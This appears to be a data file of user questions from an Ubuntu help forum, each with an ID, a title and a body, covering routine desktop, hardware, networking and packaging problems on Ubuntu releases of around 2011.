49740	how to disable vga	if i run lspci | grep vga i get below output which tells me below vga cards are present on my computer . 01:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 220 ] ( rev a2 ) 08:02.0 vga compatible controller : ati technologies inc es1000 ( rev 02 ) the es1000 is an onboard card which came with my machine . do anyone know how to disable this vga on my machine . the reason for this request is because if i run xrandr i get the output as shown below : xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 240 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 50.0* 800x600 51.0 52.0 53.0 680x384 54.0 55.0 640x480 56.0 512x384 57.0 400x300 58.0 320x240 59.0 which means i am not able to configure nvidia to accept smaller resolution . thank you .
49746	google desktop shortcut ctrl + ctrl weird behavior	just noticed a weird behavior of google desktop shortcut ctrl + ctrl . this shortcut is supposed to bring google desktop search bar to the front . if ctrl + ctrl is pressed the search bar appears , but once you release one of the ctrl keys it will disappear . if you hold one ctrl key , and press the other twice the search bar will toggle it 's state . do you have any idea how this can be fixed and what can be causing this behaviour ?
49748	how can i set a per terminal bell with xterms ?	i 'm using natty . i 'm using classic . i use raw xterms ( the latest build , 270 , in fact ) . i 've done xset b 100 pactl upload-sample /usr/share/sounds/ubuntu/stereo/message.ogg bell.ogg but i want something more fine grained than this : i want to say `` if the bell originated in some particular pseudoterminal make a particular sound , but if it originated in some other particular pseudoterminal , generate some other sound ''
49752	webex `` share application '' feature does n't work	since upgrading to 11.04 , when i use webex in either chrome or firefox , and select `` share application '' i can click on applications running on my desktop , but they are n't shared . no errors are displayed . this worked fine before i upgraded . i can `` share desktop '' okay , but i 'd rather have `` share application '' working . possibly related : pandora loads maybe 60 % , then stalls out . ( but we 're talking java vs flash , i think ... )
49755	switching windows behavior in ubuntu	ubuntu supports a shortcut to switch windows ctrl+tab , but it allows you to move through apps in one direction only . direction depends on whether initially ctrl+tab or ctrl+shift+tab was pressed . ctrl+tab will move forwards , but pressing shift while moving forward does n't change the direction , it still goes forwards unlike windows default behaviour . ctrl+shift+tab will move backwards , but if shift is released while moving backwards the menu will disappear . is there a way to configure ubuntu so that you could go backwards and forwards without running the menu twice ?
49761	how can i get gedit ready for programming in ruby and ruby on rails ?	i 'd like to know which gedit plugins i could install to make programming for ruby and ruby on rails easier ?
49763	how do i switch flash players ?	firefox shows that i 've got gnash installed , but in synaptic i have the most recent adobe flashplayer . i 've been having trouble with flash content not working , and i 'd like to try switching to the adobe player . i ca n't figure out how to do that , though .
49766	unity launcher does not remember favorites	i have already looked at the similar questions , but none of the solutions there worked for me . basically , i can edit and remove icons just fine when i am in a session , but the next time i am logged in , they are reset to the default . even more perplexing is this . if i start dconf-editor , and navigate to desktop > unity > launcher , it shows the favorites that are supposed to be there , yet the default ones are still in the launcher . i have already tried sudo apt-get purge unity and then sudo apt-get install unity from a gnome session , but to no avail . any suggestions ? edit : i also tried running gksudo dconf-editor to run the program with elevated privileges . again i navigated to desktop > unity > launcher . this time the default string was there , but when i tried to edit it , it would not change to what i typed .
49777	can’t search for synaptic on gnome shell	“activities” view of gnome shell does not show up results of administrative applications , such as synaptic . to run it , you have to use alt+f2 . i’m using it in oneiric . do i have to do another thing ?
49778	display brightness adjustment not working	i have ubuntu 11.04 installed on a lenovo thinkpad t410 laptop with nvidia gt218 display controller . i am unable to adjust the display brightness . pressing fn-home and fn-end brings up the display brightness on-screen display and the indicated level increases or decreases as it should . but the actual display brightness does not change . earlier i was able to ctrl-alt-f1 over to a text terminal and then do fn-home / fn-end to successfully change the display brightness , and then ctrl-alt-f8 back to the gnome session with the new brightness . but after upgrading to 11.04 the psuedoterminals have disappeared .
49779	no sound for headphones	i was trying some of the solutions published in this forum for the same problem , but just one in particular work for me : add the line of code in the file alsa-base.conf . this just works for a few days , now the problem is back again . any solution to fix this problem for good ? compaq presario cq40 $ lspci | grep -i audio 00:14.2 audio device : ati technologies inc sbx00 azalia ( intel hda ) 01:05.1 audio device : ati technologies inc rs780 azalia controller
49780	how can i help translating ubuntu one client for windows ?	i know it is a beta , but it is planned some workaround for translations ? i recognize that it will very hard to translate it via launchpad ( it is a wpf c # app ) but , any other way to do this ?
49782	importerror : no module named gtk	after the debacle a few hours back i managed to get a working desktop after using an ethernet cable and sudo apt-get install ubuntu-desktop but now when i try to run ubuntu software center from cli this is what i get rick @ abigail : ~ $ sudo software-center traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 34 , in < module > import gtk importerror : no module named gtk any guesses how to fix this . the search box on synaptic is also missing . it has something to do with module named axi . i think the both are related .
49784	how is ~/bin added to my path ?	i have not added ~/bin to any of my .bash* files . however , $ path does list that directory . the reason i am asking this in the ubuntu specific stackexchange is because , well , i have exactly the same .bashrc , .bash_profile and .bash_aliases in both fedora and ubuntu machines ( in fact , i have them on dropbox and symlinked in ~ ) and in my fedora machines , ~/bin is not added . in other words , if i add ~/bin to my path by making an entry in .bashrc , it shows up once on fedora and twice on ubuntu . where is ~/bin being added to my path ?
49791	download selected packages to a local repository	actually i 'm a bit new to linux and i need to download some selected packages ( debian ubuntu ) to my local repository . so could you please help me to figure this out ?
49793	script at startup	i 'm using 10.10 and i need to run a script in order to get a windows-like international keyboard layout - basically , it changes how dead keys work . ( original script from this page http : //t.tam.atbh.us/en/win-us-intl-4-linux/ ) since i ca n't seem to manage to get it going from boot , i have to run a custom script to launch any application . the script : export gtk_im_module=xim setxkbmap us intl xmodmap -e 'keycode 48 = dead_acute dead_diaeresis dead_acute dead_diaeresis acute diaeresis' application_name so if i put abiword in the application_name , it runs abiword respecting the keyboard script . ideally , the original script would start at boot and then any applications i use would function with it - just like what happens if i run it first in terminal ( without the app_name line ) and then run apps from it . i tried to make the script run from boot by adding it to /etc/rc.local but to no avail . tried to add it to init.d but that also did n't work . if anyone can help , i 'd be most grateful .
49794	how to change desktop 's right-click options	again , i 'm running natty in classic mode . when i right click on the desktop , i get a practically useless menu that goes like create folder create launcher organize desktop by name ... i would like to edit this menu . note : nautilus-open-terminal is insufficient for my needs because i want to open xterms up .
49796	replace notifyosd with the xfce version	i am using ubuntu 11.04 and i want to replace the notifyosd with the xfce version ( i like how you can dismiss the notification ) . i had a look in synaptic and saw that there was a notifyosd-xfce but when i clicked install syanptic wanted to remove the gnome desktop . how do i add this without messing everything up ?
49797	how to launch an application on a specific desktop from command line ?	the title says it all . i usually have a console window on my desktop 1 ; i would like to be able to launch from there any application specifying on which desktop the application window should appear . for example , from my console window on desktop 1 . i would like to launch thunderbird in such a way that its window opens on desktop 2 . is this possible ? ( i 'm running kubuntu 9.04 )
49799	cutting of audio files	i was looking for software which is able to cut audio files into smaller pieces , for example i set seconds and miliseconds for beginning and end of cutting , and then i can save cut content as new file .
49808	networkmanager , openvpn and float	i 'm trying to use openvpn to connect to a work network . unfortunately , the work network is behind a nat , which means i have to use the float option to make it work . apparently , networkmanager does not support the float option -- - there appears to be no way of specifying it in the configuration options . i do n't want to lose networkmanager , because it provides a very convenient way of connecting to random wireless networks ; but i have to use openvpn . i 've tried using openvpn directly with a raw openvpn configuration file , and this correctly sets up the connection , but this now interacts horribly with networkmanager so things like dns and routing is all messed up . does anyone know any way of getting networkmanager to support the float option ?
49812	how to keep buttons layout when maximize windows on natty ?	how to keep buttons layout when maximize windows on natty ? with my ubuntu natty , i have a problem as following : in the normal window , the button layout of windows is in mac style but when i maximize windows , the buttons layout has change into elementary style . i want to keep the same mac style when maximize window . i 've searched much on web but i can not find the solution . anyone has solved this problem , please help me . thx so much !
49813	what makes fonts in ubuntu as sharp as fonts optimized by cleartype on windows ?	what program or configuration is responsible for making fonts sharp and clear ?
49814	`` io : postinst-must-call-ldconfig '' when creating a package	i 'm trying to create an ubuntu .deb package for the ( pretty awesome ) io language . i am not the developer of that language , so i 'm not familiar with its sourcecode yet . this is my first attempt at creating a .deb file . in order to create the .deb , i 'm following these instructions : http : //www.webupd8.org/2010/01/how-to-create-deb-package-ubuntu-debian.html so far i 've been able to create a .deb file ( io_2010.06.01-1_amd64.deb ) and a changes file ( io_201.06.01-1_amd64.changes ) . i 'm using lintian to check the changes file , and it reports an issue i do n't know how to resolve : $ lintian -ivi io_2010.06.01-1_amd64.changes ... ( lots of messages ) i : io : no-symbols-control-file usr/lib/libiovmall.so i : io : no-symbols-control-file usr/lib/libgarbagecollector.so i : io : no-symbols-control-file usr/lib/libbasekit.so e : io : postinst-must-call-ldconfig usr/lib/libiovmall.so n : n : the package installs shared libraries in a directory controlled by the n : dynamic library loader . therefore , the package must call `` ldconfig '' in n : its postinst script . n : n : refer to debian policy manual section 8.1.1 ( ldconfig ) for details . n : n : severity : serious , certainty : certain n : n : removing /tmp/oyunshehyz ... i 've read the debian manual 8.8 section . i think i understand what the problem is ( i need to make sure that ldconfig is invoked `` somewhere '' , possibly on a place called `` posinst '' ) but i do n't know how to resolve it ( i.e . where this `` posinsts '' file is and how should i change it ) . the current way of installing io in ubuntu is basically running sudo make install and then sudo ldconfig . maybe the makefile should be modified so ldconfig is called from it ? i do n't know . thanks a lot .
49817	why do i get redirected to a weird chinese site for non-existent websites ?	if i go to a web address that does n't exist such as http : //testestewcsdijncijfkdmkdfkddmkmdmdsexsecsecfvrgtoejwfej.com/ i get landed on a strange chinese page like this : this happens for all web browsers . why does this happen ? is this something installed on my computer ( malware ? ) or is it something my isp does ? extra info in response to comments/answers : ( i do n't really know much about networking so i do n't know what much of this means ) /etc/hosts : 127.0.0.1 localhost 127.0.1.1 $ computer_name # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters where $ computer_name is my actual computer name . /etc/resolv.conf : # generated by networkmanager domain 520b.com search 520b.com nameserver 192.168.1.1 output of dig siadfiosjdfosjdfsifjs.co.nz : ; < < > > dig 9.7.3 < < > > siadfiosjdfosjdfsifjs.co.nz ; ; global options : +cmd ; ; connection timed out ; no servers could be reached
49820	synaptic error : pkgproblemresolver	i have the following error e : error , pkgproblemresolver : : resolve generated breaks , this may be caused by held packages this happens when trying to install kxstudio-kernel on synaptic . i tryed sudo apt-get update sudo apt-get autoclean sudo apt-get clean sudo apt-get autoremove but it does not work . i 'm just a user , not an expert . thanks in advance
49827	what does a beginner need to know before switching to ubuntu ?	i have never worked with linux before . i always used windows . but i 'm considering installing ubuntu on my machine . i read installing ubuntu should be very easy . but are there any thing i need to keep in mind during the installation ? what are the first things i have to do when i completed the installation ? ( i wanted to tag this with 'beginner ' but i am not allowed , so i tagged with 'installation ' )
49829	how do i resolve a `` low space '' error when upgrading ?	i tried to update via the `` update manager '' , but when i click on the update button it gives a low space error . i tried running sudo apt-get clean in a terminal but that also ends in vain . how can i clean up enough space to update ? i am confused in which disk is ubuntu installed and i do n't know which disk i have to empty . i have a compaq cpu with a 1 gb ram and 250 gb hard disk and i currently dual boot my pc with windows 7 and ubuntu 10.10 .
49832	locate saved game file	i am playing bygfoot football manager game in ubuntu 11.04. i saved the game and it saved my game in `` homefolder/.bygfoot/saves '' path . now i want to play the same game on another computer . so how to find my saved game file , so that i can load that game in that computer and play . when i visit my home folder i am not able to see `` .bygfoot '' folder at all . how to access this ? please help . thank you .
49836	audio stopped working sudden in a .avi file	i watched some tv that is in a .avi file yesterday everything worked fine but this morning ( and now ) the audio stops working after 5 seconds and the video gets jumpy . info , 11.04 , asus 1201n , both vlc and movie player has the error . stefano palazzo helped with this . sudo gedit /var/log/apt/history.log . this update was the last one . start-date : 2011-06-21 00:43:42 commandline : apt-get upgrade upgrade : indicator-multiload : amd64 ( 0.2-0+31~6~15~natty1 , 0.2-0+31~7~15~natty1 ) end-date : 2011-06-21 00:43:55
49839	how to make auto login work , `` choose language '' comes up ?	i have auto-login on my 11.04 but when i start up i come to the login screen and it says `` choose a language '' but my language is already selected ( english usa ) to login i just press enter , but why does the screen come up ? how can i make it go away ? this is how it looks on start-up . i know this is a bug rapport in 11.04 but i was hoping for a workaround .
49841	how do you permanently activate all apparmor profiles ?	i want all the apparmor profiles activated wherever applicable permanently , how can i do that ?
49843	how to install a package from a ppa and ignore the official one ?	how do i tell aptitude to grab a package specifically from a ppa and ignore the one from official repository ?
49847	how do i make schelduled snapshots of an authenticated webpage ?	how can i , as an ubuntu beginner , get a daily snapshot of a webpage ? the page requires a log in and then displays a bunch of numbers that i 'm interested in . can i write a script to take care of this ? ( i am on a waiting list for college dorm housing and want to keep a close eye on the progression . there 's a long list of daily updated info that i would like to store somewhere i can easily flip through it . ) edit : so i used rinzwinds script and did some research on my own , here 's what i have so far : # ! /bin/bash filename= '' kkik '' url= '' https : //www.kollegierneskontor.dk/default.aspx ? func=kkikportal.housingrequests & lang=gb '' date=` date + % d % m % y` output= '' $ filename- $ date.html '' wget -- save-cookies cookies.txt -- post-data 'page_ctl05_main_ctl04_form_loginusername=***** & page $ ctl05 $ main $ ctl04 $ form $ loginpassword=******' wget -- load-cookies cookies.txt $ url -o $ output it successfully downloads the 'you do n't have permission ' page ( if i take out the cookies and post stuff it gives me a 'you need to log in ' page , which is different ) . am i missing anything obvious ? it does n't seem like an overly complex website . i 'm sure if i get the script to run , i 'll figure out how to make a cron job out of it .
49849	how do i get started creating an ubuntu desktop app ?	i want to create an ubuntu desktop app , specifically to replace gwibber . i can code in java , python and a few other technologies . adobe flex would have been an option until adobe decided to suck some more and stopped support for air on linux . note - i do n't care about supporting other os 's . it will be a personal ubuntu specific app . it can i open-source , i do n't mind extra help . it should integrate seamlessly with ubuntu , notifications and all . i guess python it is , is that correct ? how do i get started ?
49852	slow internet connection with 11.04	my internet connection is extremely slow after installing 11.04 , it took me over night to download and install firefox flash player pluggin . i have a laptop on the same network which is running windows7 and the speed from that is extremely fast . update manager is showing 10.1kb/s . this is really surreal . i have done some googling around and noticed others having the same problem recommend the command below to do the trick : sudo -s echo `` options ath9k nohwcrypt=1 '' > /etc/modprobe.d/ath9k.conf reboot i am not using atheros wire/wireless card . my machine is installed with broadcom gigabit ethernet card . do anyone know how to resolve this issue . i have done some search around here , and found a few post which seems to experience the same issue - but none of the suggested solution seems to help . when i run lspci , i get below output . 00:00.0 host bridge : intel corporation e7230/3000/3010 memory controller hub ( rev 81 ) 00:01.0 pci bridge : intel corporation e7230/3000/3010 pci express root port ( rev 81 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1c.5 pci bridge : intel corporation 82801gr/gh/ghm ( ich7 family ) pci express port 6 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation n10/ich7 family sata ide controller ( rev 01 ) 01:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 220 ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 07:00.0 ethernet controller : broadcom corporation netxtreme bcm5721 gigabit ethernet pci express ( rev 11 ) thanks
49853	application for fullscreen note taking with wacom tablet	i have a wacom tablet and a netbook , i would like to use both as a paper replacement for taking notes . is there some note taking application that runs in full screen and lets you save the images/vector images in a reasonable format ?
49854	weird files appearing in my home folder	for a few weeks / months now i keep discovering weird files in my home folder . they are named , for example , like this : '' 5c9543d4b30452fd64a2d60d7dfb8ce6abd677b2.14.0.794.0_service_ipc '' . its a 0 byte file of the type `` socket ( inode/socket ) '' . any ideas where this could come from ? i 'm deleting them every now and then , but they keep appearing again ... my guess would be something like tomcat or mysql creates the file , but both were turned off using chkconfig .
49858	where can i find the latest news on ubuntu 11.10 ?	where can i find the latest news on ubuntu 11.10 ? i 'm interested in what default applications are going to be present in 11.10 .
49862	rhythmbox missing japanese/chinese/korean characters in the song titles	i 've got in the database several japanese/chinese/korean song that are shown with `` random '' characters ( i think i should install a language package ... but i do n't know which one ) .
49865	how to share music through daap using rhythmbox ?	i have enabled daap plugin in rhythmbox , ticked the `` share my music '' option , but no daap server shows up in my other clients ( android and another pc ) . am i missing something , like firewall configurations , router configurations , etc ? i can talk to people over bonjour , so i guess avahi/zeroconf is running properly .
49866	how do i delete everything in /var/mail/username from the command line ?	as a result of a long-running cron job , i have over 1,000 messages in my user 's mailbox . what 's the easiest way to delete them ?
49869	how to roll back ubuntu to a previous version ?	i just installed a new version of ubuntu and i want to roll it back to the previous version . how can i do that ? is that even possible ?
49873	input from the keyboard stops working when i log in	once logged in to gnome session , ubuntu not taking input from keyboard ... while logging i was able to enter administrator password but once that is done it is not taking input from keyboard ... i tried to do the system testing but i am not able to type administrator password for that ... i am using ubuntu 10.04 with gnome desktop environment . please help me ...
49876	alternatives to firefox 3.5/pow to use ssjs ?	i have to install ffx 3.5 on my 11.04 machine . it 's needed because i 'm helping a friend of mine in a project involving server-side javascript , and he is using pow webserver , actually avaliable for linux only as a firefox addon . ( i know it 's a dumb thing ) the addon is compatible only with ffx 3.5 and older , but i cant ' find any official package of firefox 3.5 for linux . so the questions are two : where can i find a package of firefox 3.5 for linux ? [ solved ] is there any alternative ssjs webserver out there ? it 's main use will be displaying ssjs files in the browser ( possibly on-the-fly , that means i have not to create a webserver in ssjs , like in the case of nodejs )
49877	no longer able to boot stuck in busybox shell	i 've installed win 7 and ubuntu 11.04 . after a storm killed the power . i 'm unable to boot . i 'm stuck in the busybox shell ( ash ) . here 's what happens when i boot : bios loads grub displays option to load : ubuntu ubuntu recovery memtest another memtest option win7 win 7 recovery i load ubuntu this cause it to load and i see no normal ubuntu screen just the busybox shell i try loading ubuntu via fsck -l ; and it returns me a /bin/sh not found error . i load windows 7 and i 'm unable to boot . i get a blue screen of death i then load ubuntu recovery and i do n't have any luck either . any ideas where to go from here ?
49886	how can i tell if i am using the gstreamer codecs ?	i installed the gstremer fluendo codecs . how do i know if i am using them or how do i specify them as an argument for vlc or mplayer ?
49888	when will firefox 5 be in the official repositories ?	firefox 5 has been released today , so i want to know when firefox 5 will be in the official natty repositories . i do n't want to upgrade using a ppa .
49890	what is the difference between remove and completely remove in synaptic package manager ?	i did not notice any difference between them . i was hoping `` completely remove '' will remove all hidden configuration files in the home directories , but it is not doing that . so , what actually is the difference between them ? and is it possible to remove also all configuration files when uninstalling an application ? thanks
49892	how do i get calibre to fetch news ?	after spending a while figuring out calibre 's news fetching feature , and spending another while slowly editing the recipes as it maxed out the cpu , i was disappointed to find that resulting the ebooks were all 0.0mb . i disabled my proxy but still no good .
49893	how does btrfs raid work in degraded mode ?	my idea was that ( using loopback devices ) it works like this create the raid array sudo mkfs.btrfs -m raid1 -d raid1 /dev/loop1 /dev/loop2 you mount them sudo mount /dev/loop1 /mnt and mark them touch goodcondition you unmount and simulate disk failure ( remove disk or delete loopback device loop2 in my case ) you mount degraded -o degraded and mark again touch degraded you add the bad disk again sudo btrfs dev add /dev/loop2 you rebalance sudo btrfs fi ba /mnt and raid 1 should work again . but that 's not the case . sudo btrfs fi show : total devices 3 fs bytes used 28.00kb devid 3 size 4.00gb used 264.00mb path /dev/loop1 devid 2 size 4.00gb used 272.00mb path /dev/loop2 *** some devices missing the file degraded lives on loop1 but not on loop2 when loop2 is mounted in degraded mode . why is that ?
49900	is there any open source software similar as instagram	i ask you guys if anyone knows if there is an open software , similar to instagram for desktop or phone use ? i know that there is gimp , inkskape and others , but i want something similar to instagram specifically . thanks in advance .
49901	window is invading wrong workspace when clicked on unity launcher icon	i think this is a bug but will report this here before . there are 4 conditions to reproduce this problem : you have a window open on one of the two bottom workspaces this window is touching the top and bottom of your screen ( but is not maximized ) you are on the workspace just above the one where the window is open you click on the unity launcher of this application instead of bringing you down to the workspace where the window is open or bringing the window up to the workspace where you are , what happens is that the window will shift down and partially invade the top workspace . additionally if you launch workspace switcher at this point and try dragging the window up to the workspace above the window will look as if it was behind the workspace ( it will not appear on the workspace above ) am i doing something wrong or is this really a bug ?
49908	support for hrt music streamer ii	i 'm considering a hrt music streamer ii dac ( digital analog converter ) for my htpc . i run ubuntu 10.10 , but considering a upgrade to 11.04 . will this dac be p'n'p , or at least easy to set up ? http : //www.highresolutiontechnologies.com/support/ indicates its supported on mac and windows . linux is not mentioned . all my searches seems to indicate that its a bit troublesome , but those are posts from 2009 and older .
49909	my sound is not working	i am not able to hear any sound . does anyone have a clue how to proceed in fixing this ? issuing aplay gives this $ aplay -l **** list of playback hardware devices **** card 0 : nvidia [ hda nvidia ] , device 0 : vt1708s analog [ vt1708s analog ] subdevices : 2/2 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 card 0 : nvidia [ hda nvidia ] , device 1 : vt1708s digital [ vt1708s digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0
49910	how to distinguish between identical usb-to-serial adapters ?	i use a number of identical usb-to-serial adapters with my laptop ( ubuntu 9.10 ) . the adapters are manufactured by sabrent and are built around a prolific pl2303 ic , as shown by lsusb : bus 001 device 008 : id 067b:2303 prolific technology , inc. pl2303 serial port bus 001 device 007 : id 067b:2303 prolific technology , inc. pl2303 serial port bus 001 device 006 : id 067b:2303 prolific technology , inc. pl2303 serial port none of the attributes displayed by udevadm seem to be unique to a particular adapter : foo @ bar : ~ $ udevadm info -- attribute-walk -- path=/sys/bus/usb-serial/devices/ttyusb0 looking at device '/devices/pci0000:00/0000:00:1d.7/usb1/1-4/1-4.1/1-4.1:1.0/ttyusb0 ' : kernel== '' ttyusb0 '' subsystem== '' usb-serial '' driver== '' pl2303 '' attr { port_number } == '' 0 '' looking at parent device '/devices/pci0000:00/0000:00:1d.7/usb1/1-4/1-4.1/1-4.1:1.0 ' : kernels== '' 1-4.1:1.0 '' subsystems== '' usb '' drivers== '' pl2303 '' attrs { binterfacenumber } == '' 00 '' attrs { balternatesetting } == '' 0 '' attrs { bnumendpoints } == '' 03 '' attrs { binterfaceclass } == '' ff '' attrs { binterfacesubclass } == '' 00 '' attrs { binterfaceprotocol } == '' 00 '' attrs { modalias } == '' usb : v067bp2303d0300dc00dsc00dp00icffisc00ip00 '' attrs { supports_autosuspend } == '' 1 '' looking at parent device '/devices/pci0000:00/0000:00:1d.7/usb1/1-4/1-4.1 ' : kernels== '' 1-4.1 '' subsystems== '' usb '' drivers== '' usb '' attrs { configuration } == '' '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmattributes } == '' 80 '' attrs { bmaxpower } == '' 100ma '' attrs { urbnum } == '' 538 '' attrs { idvendor } == '' 067b '' attrs { idproduct } == '' 2303 '' attrs { bcddevice } == '' 0300 '' attrs { bdeviceclass } == '' 00 '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 00 '' attrs { bnumconfigurations } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { speed } == '' 12 '' attrs { busnum } == '' 1 '' attrs { devnum } == '' 6 '' attrs { version } == '' 1.10 '' attrs { maxchild } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { authorized } == '' 1 '' attrs { manufacturer } == '' prolific technology inc. '' attrs { product } == '' usb-serial controller '' < snip > foo @ bar : ~ $ udevadm info -- attribute-walk -- path=/sys/bus/usb-serial/devices/ttyusb1 looking at device '/devices/pci0000:00/0000:00:1d.7/usb1/1-4/1-4.5/1-4.5:1.0/ttyusb1 ' : kernel== '' ttyusb1 '' subsystem== '' usb-serial '' driver== '' pl2303 '' attr { port_number } == '' 0 '' looking at parent device '/devices/pci0000:00/0000:00:1d.7/usb1/1-4/1-4.5/1-4.5:1.0 ' : kernels== '' 1-4.5:1.0 '' subsystems== '' usb '' drivers== '' pl2303 '' attrs { binterfacenumber } == '' 00 '' attrs { balternatesetting } == '' 0 '' attrs { bnumendpoints } == '' 03 '' attrs { binterfaceclass } == '' ff '' attrs { binterfacesubclass } == '' 00 '' attrs { binterfaceprotocol } == '' 00 '' attrs { modalias } == '' usb : v067bp2303d0300dc00dsc00dp00icffisc00ip00 '' attrs { supports_autosuspend } == '' 1 '' looking at parent device '/devices/pci0000:00/0000:00:1d.7/usb1/1-4/1-4.5 ' : kernels== '' 1-4.5 '' subsystems== '' usb '' drivers== '' usb '' attrs { configuration } == '' '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmattributes } == '' 80 '' attrs { bmaxpower } == '' 100ma '' attrs { urbnum } == '' 69 '' attrs { idvendor } == '' 067b '' attrs { idproduct } == '' 2303 '' attrs { bcddevice } == '' 0300 '' attrs { bdeviceclass } == '' 00 '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 00 '' attrs { bnumconfigurations } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { speed } == '' 12 '' attrs { busnum } == '' 1 '' attrs { devnum } == '' 7 '' attrs { version } == '' 1.10 '' attrs { maxchild } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { authorized } == '' 1 '' attrs { manufacturer } == '' prolific technology inc. '' attrs { product } == '' usb-serial controller '' < snip > all of the adapters are plugged into a single usb hub . since i ca n't distinguish between the adapters themselves , is there any way i can write a udev rule that fixes the name of each adapter based on which physical port on the hub the adapter is plugged into ?
49919	disabling trackpoint in hp elitebook 8730w ?	the trackpoint is kinda broken ... on slightest touch it yanks down the mouse pointer to the bottom of the screen . with enough fingering i can make it free again . gpointing-device-settings does not show any config option for the trackpoint . please help ...
49920	monitor display issue	when booting i will have to boot maybe 3 or 4 times to get a screen that is not displayed diagonally or is not using the full screen width . hardware specification : hp s7727c with amd64 and nvidia chipsets and insignia 22 '' monitor/tv . the ubuntu version is 9.10 karmic . i 'd like to stay current with ubuntu on this machine , but have gone down to 9.10 to get this described functioning . i tried higher versions and could not get past the `` black screen '' i think this issue is connected to the nvidia chipset/driver problem . i am a gui user and i do n't follow the other solutions posted which make use of the command line . i suppose if the command line solution could be given without making any assumptions of the receiving person 's knowledge base , then even i and others like me , could implement it . thank you for your time and assistance . doug
49921	creating shortcuts to run applications conditionally	i was wondering if it is possible to create a keyboard shortcut to run application if it is not yet running in ubuntu ? this is a valid example for something like a browser which is normally heavily used , and you would n't really want to run another instance of it if there is one running already ( rather just activate the window ) .
49925	after 10.10 - > 11.04 upgrade , can only login via classic ( no effects )	yesterday i upgraded from 10.10 to 11.04 , everything seemed to go okay until immediately after login : the desktop goes into a `` corrupted '' looking state ( similar to having too high resolution set ) . i can see some kind of movement by moving the mouse around/right clicking , and can enter text terminals via ctrl + alt + f1 it does this in both plain `` ubuntu '' and `` ubuntu classic '' , and only seems to login/startup properly with ubuntu classic ( no effects ) . i have checked my video card ( radeon x600 ) and run the unity support test which passes with all `` yes '' results ( unity supported : yes ) : /usr/lib/nux/unity_support_test -p i have tried re-installing my ubuntu desktop : rm -rf .gnome .gnome2 .gconf .gconfd .metacity sudo apt-get remove ubuntu-desktop sudo apt-get install ubuntu-desktop with no success . i can workaround for now with classic ( no effects ) , but i 'd really like to find the root problem . any suggestions on what else to try would be appreciated !
49927	installing 10.04 server on hp xw9400 workstation with raid 5	i have a workstation that was given to me that is a friggen powerhouse , so i figured i would set it up as my development and demo server . this is my first experience installing ubuntu onto a raid array and so far it has not been a fun one . i have been following the advanced installation guide for installing ubuntu 10.04 server , and it says that there will be an option on the partition disks screen to manually create the partitions , but the only options i have are : configure iscsi volumes undo changes to partitions finish partitioning and write changes to disk just before i got to that screen i got a message that said : one or more drives containing serial ata raid configurations have been found . do you wish to activate these raid devices ? it does n't matter whether i answer yes or no to that , i still get the same partition disks screen . when i try to select finish partitioning and write changes to disk i just get the no root file system error . has anyone else experienced this , and how do i get past it ? can i not run ubuntu on this machine ?
49928	unity launcher resets every time i log in	i think something went wrong with my installation . for one , the live-installer was still there ( though i uninstalled that ) and every log in , the unity launcher resets to the default set of applications . other settings , like my desktop , do persist , though . help ?
49930	where are passwords stored ?	how do you figure out where are user 's passwords stored , for users that can login ? i know the system is using ldap for users ( username , home path , etc . ) , but it does n't contain any kind of passwords . i have access to a configured machine , so how do i figure out where are passwords ? ( which config file ? )
49938	how to connect to free starbucks wifi via command-line ?	i want to connect to a free open wifi , like starbucks , but i do n't want a full-fledged desktop gui like unity or gnome . how can i do this via command-line ( pretending my install base is ubuntu server + drivers for my wifi card ) ?
49940	how to get back the firefox apparmor profile after deleting it ?	i deleted the apparmor profile for firefox when i was tinkering with it ... and now i ca n't get it back . i uninstalled ( complete ) the apparmor program , profiles , etc . and when it reinstalled , i still do n't get the profile back ( ie . /etc/apparmor.d./usr.bin.firefox* ) i learned that the apparmor profile for firefox is actually an apart of the firefox package ... but i uninstalled firefox and reinstalled it and i still did n't get the file usr.bin.firefox ) is there somewhere i can download the file manually ?
